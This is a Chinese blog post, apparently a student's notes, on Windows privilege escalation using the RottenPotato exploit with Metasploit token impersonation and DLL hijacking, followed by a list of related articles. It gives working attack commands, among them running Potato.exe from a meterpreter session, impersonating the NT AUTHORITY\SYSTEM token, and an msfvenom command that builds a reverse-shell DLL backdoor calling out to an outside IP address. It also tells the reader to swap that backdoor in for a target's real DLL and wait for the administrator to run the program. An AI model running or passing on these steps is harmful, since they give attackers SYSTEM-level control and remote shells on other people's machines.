WIN提权 烂土豆&dll劫持

最新推荐文章于 2025-05-07 15:30:38 发布
最新推荐文章于 2025-05-07 15:30:38 发布
阅读量912 收藏
点赞数
分类专栏: win提权 文章标签: windows 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65096687/article/details/130837269
版权

烂土豆配合令牌劫持提权(win2012及以下版本可以尝试)

两者配合使用可以直接从web权限提升到system权限

msf反弹后监听

上传文件Potato.exe

upload /home/yx/桌面/Potato.exe

上传至目标主机目录

烂土豆也很鸡肋

在shell中使用

whoami /priv

 

查看当前用户是否具有 

~ SeImpersonatePrivilege  或   SeAssignPrimaryTokenPrivilege 权限

才能配合msf令牌窃取提权

我真实服了。我虚拟机win7的普通账户没有这两个权限。我也不知道为啥,我查百度如何开启。

没查出来但是我的win7 admintrator 有这个权限。

然后我切换了用户进行相关提权。

但是win7的管理员账户直接可以msf的令牌窃取,还要烂土豆干毛,果然是烂土豆。

所以说在实战中使用烂土豆配合msf令牌窃提权。首先要查看是否有这两条权限之一。如果没有,就不用白忙活

这里用管理员的账户继续使用烂土豆和msf令牌窃取提权

然后我们使用烂土豆

execute -cH -f ./potato.exe

完成后使用msf令牌窃取,走流程

use  incognito  使用模块

list_token -u    产看可以窃取的system令牌

impersonate_token "NT AUTHORITY\\SYSTEM"   利用

 

 

dll劫持(win通杀)

鸡肋玩意

需要特定条件,需要服务器上有特定软件,且管理员也在经常使用。

dll 动态链接库。简单来说就是win启动程序时候需要调用dll文件。然后我们对dll文件进行替换。

说一下过程

1.信息搜集,查看对方有哪些第三方软件(有webshell翻他目录找第三方软件  )

2.进程调试,我们分析改软件运行时候调用了哪些dll。我们需要把第三方软件下载到本地进行找到他运行的dll文件(非系统文件)(火绒剑)

3.msf制作dll后门文件进行替换

msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.169.46 lport=6677 -f dll >/opt/yx.dll

 4.然后把他的原本的dll文件删除,将我们的dll文件更改与他相同名的dll文件,使他启动时候调取的是我们的后门dll文件。

5.等待对方管理员启动程序,我们msf后门监听上线。

使用的条件

1.对方要装有第三方软件

2.对方管理员需要启动

web升-令牌窃取&土豆&dll劫持
m0_61506558的博客
10-20 555
通过中间人攻击,将COM(NT\SYSTEM限)在第二步挑战应答过程中认证的区块改成自己的区块获取SYSTEM令牌,然后利用msf的模仿令牌功能模仿SYSTEM令牌。dll劫持需要特定软件应用的控制限及启用配合,复杂鸡肋AlwaysInstallElevated默认禁用配置,利用成功机会很少(四)不带引号服务路径配合MSF-web当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行(如图1)。
Windows笔记-动态库劫持(dll劫持、包含多种绕过UAC方法)
墨痕诉清风的博客
03-12 872
dll 劫持是也是绕过 UAC 常用的方法,在 UACME 项目中很多绕过方法都是使用 dll 劫持。dll 劫持也是一个比较大的主题。一般操作如下,假设受信任的程序 c:\windows\system32\test\test.exe 会加载 c:\windows\system32\test.dll (不在 KnowsDLLS里面),
- Windows 土豆/ dll劫持 /服务
acepanhuan的博客
03-01 1356
- Windows 土豆/ dll劫持 /服务
Windows-土豆
qq_43381463的博客
03-09 917
土豆,即使用CVE-2016-3225(MS16-075)漏洞进行,当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特升漏洞。成功利用此漏洞的攻击者可以使用升的特执行任意代码。攻击者登录系统后,运行一个经特殊设计的应用程序利用此漏洞,从而控制受影响的系统。
DLL劫持攻击生成器:理论与防范
最新发布
weixin_35516273的博客
05-07 783
动态链接库(DLL)劫持是一种攻击技术,攻击者通过修改系统环境路径或重定向某些DLL调用,来强制应用程序加载攻击者指定的恶意DLL文件。当应用程序试图加载一个合法的DLL文件时,恶意的DLL文件会被执行,进而可能导致未经授的数据访问、数据泄露,甚至系统升。DLL劫持生成器通常利用Windows系统加载DLL文件时的搜索顺序进行攻击。当一个应用程序尝试加载一个DLL时,操作系统按照特定的顺序搜索DLL文件。这通常包括应用程序所在的目录、系统目录和环境变量中的路径。
Windows土豆
2401_84275261的博客
04-18 933
我们今天利用土豆来对windows进行;靶机:windows-2003我们先用kali的msf工具生成一个木马。msf启动命令:msfconsole,或者直接输入命令来生成木马这里先启动msf然后我们生成木马最后通过通过中国菜刀将我们生成的木马放入目标网站启动msf的监听状态设置参数。接下来用最常规的方法,发现失败我们需要查找可以利用的漏洞,今天以“土豆”为例作为演示设置对应的参数,并开始攻击结果还是不能成功拿到限,我们可以用伪造token值(在身份认证中,token是令牌(临时)的意思,
Windows土豆复现(MS16-075)
oiadkt的博客
03-08 2793
Windows土豆复现(MS16-075)
windows土豆(RottenPotato)及Juicy Potato
热门推荐
negnegil的博客
09-11 1万+
介绍 土豆(Rotten Potato) MS16-075 是一个本地,只针对本地用户,不支持域用户 适用版本:Windows 7、8、10、2008、2012 土豆下载地址: https://github.com/foxglovesec/Potato 土豆原理: 欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通
-win土豆&dll劫持&引号路径&服务
qi_SJQ_的博客
02-02 1785
以下几种方法的适合环境(web用户/本机用户)因方法而不同,有的方法在两种限下都适用,一般也都是本机限大于webshell限。 win 土豆(MS16-075): 土豆(Rotten Potato)是一个本地,是针对本地用户的,不能用于域用户,webshell环境或本地普通用户环境都可以适用。 过程:msf生成上传土豆-执行土豆-利用msf窃取模块-窃取 SYSTEM-成功(漏洞编号:CVE-2016-3225 )。 我们是用之前的令牌窃取无法成功,因为web.
第62天-升-土豆&dll 劫持&引号路径&服务
MCTSOG的博客
05-07 1599
思维导图 演示案例: 案例一 Win2012-土豆配合令牌窃取-Web 限 单纯令牌窃取:适用于web限或本地 如配合土豆:适用于web或数据库等原理 RottenPotato RottenPotato(土豆的原理可以简述如下: 1.欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 2.对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的
Windows--小迪升--土豆--DLL劫持--udf
z2560088的博客
02-13 4499
针对环境 windows有两种环境,一种是web网站拿到的webshell环境,一般是低限的用户,(jsp除外,拿到webshell就是system限)另一种是本地的环境,可能是服务器为管理某项服务创建的低限用户。不同环境下的操作会有所不同。 方法 1.win溢出漏洞(如何判断类型和利用) 信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取? 利用wes进行补丁筛选 2.数据库 ...
windows本地--dll劫持&不带引号的服务&不安全的服务
金灰的博客
04-25 1015
本地--->system。
windows工具
01-15
可以对win2K3-win2012 server进行 win7也可以,win10没试过
DLL劫持生成器.exe
05-21
一键生成DLL文件函数。
Windows 下的 7 种 DLL 劫持技术
weixin_33766805的博客
09-18 1788
本文讲的是Windows 下的 7 种 DLL 劫持技术,在本文中,我将列出半打可以在Windows运行用户模式的进程中使用DLL注入技术。也许可能会有更多类似的技术,但我正在和你分享的是我所拥有的第一手的技术。 AppInit_DLLs 人们以前往往依赖于AppInit_DLLs注册表项。它是操作系统加载程序查询此值并加载创建进程时指定的DLL。我在...
dll 劫持和应用研究
顶峰
03-31 781
2020年12月,SolarWinds 攻击事件引发全球的关注(),攻击团队在 2020年上旬通过对 SolarWinds Orion产品实现供应链攻击,导致诸多厂商被攻击,造成了不可估量的损失。这种国家间的 APT 攻击包含了大量的技术细节,其中供应链攻击的实现,也就是 SUNBURST 后门植入这一块引起了我极大的兴趣。
升:土豆 || DLL 劫持.
网络安全领域___专研者.
05-01 1438
升简称,由于操作系统都是多用户操作系统,用户之间都有限控制,比如通过 Web 漏洞拿到的是 Web 进程的限,往往 Web 服务都是以一个限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其升为管理甚至是 System 限。通常通过操作系统漏洞或操作系统的错误配置进行,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行
dll劫持的实现原理
milk416666的博客
08-31 569
DLL劫持攻击的基本思想是:将恶意代码注入到目标进程中,然后在目标进程中使用LoadLibrary()函数加载一个合法的DLL文件,但实际上却加载了恶意代码生成的假DLL文件。当目标进程调用DLL中的函数时,实际上是在调用恶意代码中的函数,从而实现对目标进程的控制和窃取信息等恶意行为。当目标进程尝试加载一个未被授的DLL文件时,系统会抛出异常并终止该进程。DLL劫持是一种常见的攻击技术,它利用Windows操作系统中DLL加载机制的漏洞,将恶意代码注入到合法进程中,并在运行时劫持和控制目标进程的执行。
浅谈dll劫持免杀
记录学习,一起进步
11-25 1917
浅谈dll劫持-白加黑免杀指南
升策略:土豆、dll劫持与服务路径详解
在IT安全领域,本篇内容主要关注于Windows操作系统中的高级升技术,特别是通过土豆(Potato.exe)和DLL劫持来获取更高的限。首先,我们来探讨以下几个关键概念: 1. **升与土豆(Potato.exe)**...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值